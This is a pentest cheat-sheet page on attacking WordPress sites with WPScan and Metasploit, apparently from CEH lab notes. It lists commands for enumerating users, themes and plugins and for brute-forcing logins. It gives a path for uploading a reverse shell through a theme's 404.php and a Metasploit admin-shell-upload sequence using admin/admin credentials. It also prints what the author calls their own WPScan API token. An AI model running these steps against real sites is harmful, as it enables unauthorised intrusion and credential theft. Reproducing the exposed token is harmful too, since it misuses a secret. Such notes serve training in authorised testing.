๐Ÿ”WPScan

https://www.kali.org/tools/wpscan/

wpscan -h #List WPscan Parameters
wpscan --update #Update WPscan

#Enumerate WordPress using WPscan


wpscan --url "http://<TARGET_IP>" -e t #All Themes Installed

wpscan --url "http://<TARGET_IP>" -e vt #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e p #All Plugins Installed

wpscan --url "http://<TARGET_IP>"  -e vp #Vulnerable Themes Installed

wpscan --url "http://<TARGET_IP>"  -e u #WordPress Users

wpscan --url "http://<TARGET_IP>"  --passwords path-to-wordlist #Brute Force WordPress Passwords

#Upload Reverse Shell to WordPress
http://<IP>/wordpress/wp-content/themes/twentyfifteen/404.php

#Upload using Metasploit
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set USERNAME admin
msf exploit(wp_admin_shell_upload) > set PASSWORD admin
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
#User Enumeration
wpscan --url https://example/ --enumerate u

#Bruteforce
wpscan --url https://example/ --passwords wordlist.txt --usernames samson

Enumerate and hack a web app using wpscan and metasploit

  • wpscan โ€” api-token hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads โ€” url http://10.10.10.16:8080/CEH โ€” plugins-detection aggressive โ€” enumerate u

  • โ€” enumerate u: Specify the enumeration of users

  • API Token: Register at https://wpscan.com/register

  • Mine: hWt9qrMZFm7MKprTWcjdasowoQZ7yMccyPg8lsb8ads

  • service postgresql start

  • msfconsole

  • use auxiliary/scanner/http/wordpress_login_enum

  • show options

  • set PASS_FILE password.txt

  • set RHOST 10.10.10.16

  • set RPORT 8080

  • set TARGETURI http://10.10.10.16:8080/CEH

  • set USERNAME admin

  • run

  • Find the credential

Additional Resources

PreviousWireshark or TcpdumpNextZap

Last updated